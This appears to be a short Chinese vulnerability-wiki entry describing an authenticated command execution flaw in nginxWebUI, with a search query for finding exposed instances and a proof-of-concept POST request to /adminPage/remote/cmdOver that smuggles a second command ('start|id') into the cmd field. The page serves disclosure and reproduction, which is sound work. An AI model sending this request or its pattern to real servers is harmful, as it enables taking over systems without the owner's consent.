# nginxWebUI cmdOver 后台命令执行漏洞

# 漏洞描述

nginxWebUI 后台存在命令执行漏洞，攻击者登录后台后可以执行任意命令获取服务器权限

# 漏洞影响

nginxWebUI

# 网络测绘

title="nginxwebui"

# 漏洞复现

登录页面

验证请求包

POST /adminPage/remote/cmdOver

remoteId=local&cmd=start|id&interval=1

1
2
3

JumpServer 未授权接口远程命令执行漏洞 TerraMaster TOS 用户枚举漏洞 CVE-2020-28185